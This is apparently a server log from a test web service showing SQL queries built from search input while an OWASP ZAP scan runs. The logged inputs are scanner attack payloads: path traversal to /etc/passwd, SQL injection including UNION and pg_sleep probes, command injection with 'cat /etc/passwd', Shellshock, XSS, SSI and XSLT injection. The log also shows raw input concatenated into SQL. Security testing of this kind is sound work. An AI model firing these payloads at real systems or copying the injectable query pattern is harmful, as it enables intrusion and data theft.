2021-10-27 18:47:48.214  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:47:59.123  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%/etc/passwd%' 
2021-10-27 18:47:59.182  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%../../../../../../../../../../../../../../../../etc/passwd%' 
2021-10-27 18:47:59.234  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%c:/%' 
2021-10-27 18:47:59.248  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%/%' 
2021-10-27 18:47:59.299  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%c:\%' 
2021-10-27 18:47:59.320  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%../../../../../../../../../../../../../../../../%' 
2021-10-27 18:47:59.331  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%WEB-INF/web.xml%' 
2021-10-27 18:47:59.383  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%WEB-INF\web.xml%' 
2021-10-27 18:47:59.397  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%/WEB-INF/web.xml%' 
2021-10-27 18:47:59.409  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%\WEB-INF\web.xml%' 
2021-10-27 18:47:59.459  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%thishouldnotexistandhopefullyitwillnot%' 
2021-10-27 18:47:59.800  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http://www.google.com/%' 
2021-10-27 18:47:59.850  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http://www.google.com:80/%' 
2021-10-27 18:47:59.906  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http://www.google.com%' 
2021-10-27 18:47:59.967  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http://www.google.com/search?q=OWASP%20ZAP%' 
2021-10-27 18:48:00.019  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http://www.google.com:80/search?q=OWASP%20ZAP%' 
2021-10-27 18:48:00.075  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%www.google.com/%' 
2021-10-27 18:48:00.127  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%www.google.com:80/%' 
2021-10-27 18:48:00.145  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%www.google.com%' 
2021-10-27 18:48:00.161  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%www.google.com/search?q=OWASP%20ZAP%' 
2021-10-27 18:48:00.214  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%www.google.com:80/search?q=OWASP%20ZAP%' 
2021-10-27 18:48:00.584  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.638  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http://1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.691  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%https://1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.747  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%http:\\1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.759  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%https:\\1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.811  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%//1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.823  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%\\1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.839  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%HtTp://1004766269584424041.owasp.org%' 
2021-10-27 18:48:00.894  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%HtTpS://1004766269584424041.owasp.org%' 
2021-10-27 18:48:01.015  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%<!--#EXEC cmd="ls /"-->%' 
2021-10-27 18:48:01.075  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%"><!--#EXEC cmd="ls /"--><%' 
2021-10-27 18:48:01.453  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%0W45pz4p%' 
2021-10-27 18:48:01.516  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%"><script>alert(1);</script>%' 
2021-10-27 18:48:01.622  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%zApPX1sS%' 
2021-10-27 18:48:01.873  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:02.834  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:02.892  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:03.108  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:03.158  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%'%' 
2021-10-27 18:48:03.208  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP'%' 
2021-10-27 18:48:03.246  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%"%' 
2021-10-27 18:48:03.259  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP"%' 
2021-10-27 18:48:03.311  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%;%' 
2021-10-27 18:48:03.327  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP;%' 
2021-10-27 18:48:03.341  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%'(%' 
2021-10-27 18:48:03.376  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP'(%' 
2021-10-27 18:48:03.412  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:03.433  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:03.485  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP AND 1=1 -- %' 
2021-10-27 18:48:03.500  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP AND 1=2 -- %' 
2021-10-27 18:48:03.555  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP OR 1=1 -- %' 
2021-10-27 18:48:03.606  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP' AND '1'='1' -- %' 
2021-10-27 18:48:03.656  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP" AND "1"="1" -- %' 
2021-10-27 18:48:03.711  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP AND 1=1%' 
2021-10-27 18:48:03.780  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP AND 1=2%' 
2021-10-27 18:48:03.797  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP OR 1=1%' 
2021-10-27 18:48:03.811  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP UNION ALL select NULL -- %' 
2021-10-27 18:48:03.862  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP' UNION ALL select NULL -- %' 
2021-10-27 18:48:03.896  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP" UNION ALL select NULL -- %' 
2021-10-27 18:48:03.916  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP) UNION ALL select NULL -- %' 
2021-10-27 18:48:03.967  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP') UNION ALL select NULL -- %' 
2021-10-27 18:48:04.003  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:14.396  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP&cat /etc/passwd&%' 
2021-10-27 18:48:14.449  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP;cat /etc/passwd;%' 
2021-10-27 18:48:14.464  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP"&cat /etc/passwd&"%' 
2021-10-27 18:48:14.516  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP";cat /etc/passwd;"%' 
2021-10-27 18:48:14.531  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP'&cat /etc/passwd&'%' 
2021-10-27 18:48:14.625  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP';cat /etc/passwd;'%' 
2021-10-27 18:48:14.665  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP&sleep 15&%' 
2021-10-27 18:48:14.720  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP;sleep 15;%' 
2021-10-27 18:48:14.730  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP"&sleep 15&"%' 
2021-10-27 18:48:14.740  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP";sleep 15;"%' 
2021-10-27 18:48:14.790  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP'&sleep 15&'%' 
2021-10-27 18:48:14.823  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP';sleep 15;'%' 
2021-10-27 18:48:14.916  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:15.449  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%Set-cookie: Tamper=f477080f-acd2-4087-bd16-b4b3129947d4%' 
2021-10-27 18:48:15.500  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%any
2021-10-27 18:48:15.553  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%any?
2021-10-27 18:48:15.606  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%any
2021-10-27 18:48:15.618  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%any?
2021-10-27 18:48:15.630  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%any
2021-10-27 18:48:15.681  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%any?
2021-10-27 18:48:15.749  INFO 1 --- [nio-9000-exec-4] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:15.908  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:15.961  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%null%' 
2021-10-27 18:48:15.976  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%%' 
2021-10-27 18:48:16.006  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%@%' 
2021-10-27 18:48:16.018  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%+%' 
2021-10-27 18:48:16.075  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '% %' 
2021-10-27 18:48:16.140  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%|%' 
2021-10-27 18:48:16.727  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%() { :;}; echo 'X-Powered-By: ShellShock-Vulnerable'%' 
2021-10-27 18:48:16.833  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%() { :;}; /bin/sleep 15%' 
2021-10-27 18:48:16.903  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:16.928  INFO 1 --- [io-9000-exec-12] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:17.602  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:17.697  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:27.046  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:27.191  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:27.242  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end%' 
2021-10-27 18:48:27.301  INFO 1 --- [nio-9000-exec-5] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- %' 
2021-10-27 18:48:27.356  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%'case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- %' 
2021-10-27 18:48:27.392  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%"case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- %' 
2021-10-27 18:48:27.411  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP / case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end %' 
2021-10-27 18:48:27.550  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%"'%' 
2021-10-27 18:48:27.645  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%<!--%' 
2021-10-27 18:48:27.708  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%]]>%' 
2021-10-27 18:48:27.920  INFO 1 --- [io-9000-exec-11] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%${525809+276263}%' 
2021-10-27 18:48:30.772  INFO 1 --- [io-9000-exec-13] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%<%' 
2021-10-27 18:48:30.810  INFO 1 --- [nio-9000-exec-8] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%<xsl:value-of select="system-property('xsl:vendor')"/>%' 
2021-10-27 18:48:30.883  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%system-property('xsl:vendor')/>%' 
2021-10-27 18:48:30.970  INFO 1 --- [nio-9000-exec-3] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%"/><xsl:value-of select="system-property('xsl:vendor')"/><!--%' 
2021-10-27 18:48:32.116  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:32.148  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:32.199  INFO 1 --- [nio-9000-exec-6] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:32.228  INFO 1 --- [nio-9000-exec-1] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:32.344  INFO 1 --- [nio-9000-exec-7] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:32.393  INFO 1 --- [nio-9000-exec-2] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:32.457  INFO 1 --- [nio-9000-exec-9] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:44.302  INFO 1 --- [io-9000-exec-15] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
2021-10-27 18:48:44.321  INFO 1 --- [io-9000-exec-10] hawk.service.SearchService               : SQL Query select * from ITEM where name like '%ZAP%' 
